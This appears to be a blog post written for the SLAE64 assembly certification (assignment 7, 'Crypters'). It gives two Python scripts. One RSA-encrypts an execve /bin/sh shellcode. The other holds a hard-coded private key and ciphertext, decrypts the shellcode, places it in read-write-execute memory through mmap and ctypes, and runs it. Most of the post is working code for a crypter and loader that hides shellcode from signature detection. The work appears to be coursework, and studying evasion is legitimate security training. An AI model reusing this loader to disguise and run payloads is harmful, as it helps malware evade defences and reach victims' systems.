SLAE64 #7 - Crypters

Since shellcode is usually very small in size, I have used RSA asymmetric encryption to encrypt the shellcode. Most of the code is boilerplate code so there is not much to talk about.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding


private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
    backend=default_backend()
)

public_key = private_key.public_key()

pubpem = public_key.public_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PublicFormat.SubjectPublicKeyInfo
)


privpem = private_key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.PKCS8,
    encryption_algorithm=serialization.NoEncryption()
)

print privpem

shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")

encrypted = public_key.encrypt(
    shellcode,
    padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
)

print encrypted.encode("base64")
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
import ctypes, mmap, sys

def create_shellcode_function (shellcode_str):
    shellcode_bytes = bytes(shellcode_str)

    # Allocate memory with a RWX private anonymous mmap
    exec_mem = mmap.mmap(-1, len(shellcode_bytes),
                         prot = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
                         flags = mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)

    # Copy shellcode from bytes object to executable memory
    exec_mem.write(shellcode_bytes)

    # Cast the memory to a C function object
    ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
    function = ctypes.CFUNCTYPE( ctypes.c_int64 )(ctypes.addressof(ctypes_buffer))
    function._avoid_gc_for_mmap = exec_mem

    # Return pointer to shell code function in executable memory
    return function




private_key="""-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDjwvXM4jR2RA6v
+jXFxx9fp7pxKhHI0BJL7prbnpbdIdFLEKSszLGot9ES/0YMo6oOvsKKWB1EGSvY
JEKS+XufaTB6iw/pykw7Jmyx5pFHrboHYckUmNI5+k2y3K3XhRpJJ2Gb2vw2MhHh
6VOvfKPRv0BF8sFgOL8vwYPyN21e5AKieqD4ghEfYBOhCTKrYC0l0nm1a25Sw+pJ
NYmC3Ka4l/1DqFJ9Cr/lK4Un68Gk+z3WtxgdR97QkgJmt08YE8dIL14qfuKPtEon
JJL31Ui/5tgCmMJCl+t9gPYduY8FM4iPImJMgxeXu+9GDxdx5VEG842iNg1Lfesi
PAPOViP5AgMBAAECggEBAIj9aE4U+Czx/kuGGPWeMJaeEZujDBNWYsrc9rOFjYPv
pSybFBEDBRBPjyb39y/++Hfp8KS5HtEouqBEHu67s8lLwWbTYXziujsRf2r5HQSZ
zzxFamZDDJ7ml/kuljj8y7SYRTMy4WPPdcYFStpQA1BS0dvAiOLQ/t1AbZYwFE5v
fwvlaDy15fwUGdkM6rDsMKAwiMSSWQ9VW3Z7rLSQAPhO1hR3/pMEuMs/vac0S1AG
SUNfz/J23dfBJxtKdtrjg/CgylETscnX8E3W8kcb50zYWtwSw+lNaXoVVn65qDDY
xfMe3g1+jSNF9SN5dg8UOOW9oG/xbUkovlCYpABnZgECgYEA/G9QLO8oC6G8OJM3
t/2+SNlhYEixW0wpOLxyFAui9XWDEae5P9scWpUYGdS9kgwTtYobE92WhiWrOb6W
35a8LM1nvgOQO4dWJ9q749VKKpmKzFwT4eelSaXzQH4aw6O+ttkWqvaglUoF5gjV
5oIUZFFd1QM98bysHbvpiMFbUaECgYEA5vpwocUenkfJguCSmeeir+K0MbhNcyV5
9MTXs3KYv7d9hKZgZRsmKKDge8nwaCzdVzdQQZgQhxYRM0R6W35QOGYYuQOM1vph
XgX2JX2BD8d21/2PilrPLiBZ/x1kRephR1BqI3QX4GxEXeRf9A3K+dDBIRTLDckn
JLdKEqoV41kCgYA2qCtl70pualCEt2uDDQ/cWiT5YgP0zqLGRBc3O+XG2/DLK9Oy
fdC/1DRps2RwcOj7j7GZNYtX9GQElr24H70Svk7OF5ttKDqBWp0AEbiDTMd+xBkR
+sQRFDt9JVDKN3QdxxdfYRMX//US/6rAxD2CExQMAS2yX7WsonlIQQVywQKBgHtG
uwp8DIVpxxFFDrl5uYiqNIY82YlVPSv4Sy+JQCFCq4k6y0PrI4iXpHgtJVRUbaX4
7aq0oE2Y54E3UR634dTYGOXWETtD0ue9wsvrmhBz4ugQeqXbJax2s9HHPBdcqqLH
Nn7JnVy4LBz4oIW/Ps/qLMmdMWqgK3YbJTuk752xAoGABkSRTEfy6KtN4o4iAA6s
yZfzW98/goxCnjORaChrl4guvqmOsvJpfqqIiBKVJ5ITwSw9xcr/M99qWAfC2MpX
pDR9B3bgmJ+dMhCiCnLU9n7Rzz9tuMCtxXVwzl/0rMCHGh311OEyaMyfZNNPIFmg
sjhmgtz7iUSwPcWt3gIiMJE=
-----END PRIVATE KEY-----
"""

ciphertext="tGfscW1SL2tEvjlGeA+kq+DjGxb8/xOIxMjp/ZgOnOfHtsxPf11FRIH6ww8xIaQRXzgjDeQURTvESWiTVr5/apINXS+NnN8PzSuOt2baBpsqoB70DWKGNTOjBT5j2RP/kN2E/xTJ7aclDyqsv6KuOcnmP3yGbFPd4KSGUvWD/67g1s8AhOrMrX/6Km73QF4/5wBCmj1VoPcA/+c+gSoyPMGPw96RG0RDAnQTy/7Ql9CbJ+ubtvxqVK5K1cHHg5GZG7g+4u/BhcFK5UpJxZU786NbV5ARdTI8VZICJrV+oe8DFG1HlO9Q76o2hdzgrxsDAA+ZZHPv5j62OnedQtKTTg=="

private_key = serialization.load_pem_private_key(
            private_key,
            password=None,
            backend=default_backend()
        )

shellcode = private_key.decrypt(
        ciphertext.decode("base64"),
        padding.OAEP(
            mgf=padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None
        )
    )

create_shellcode_function(shellcode)()

This blog post has (not) been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-XXXXX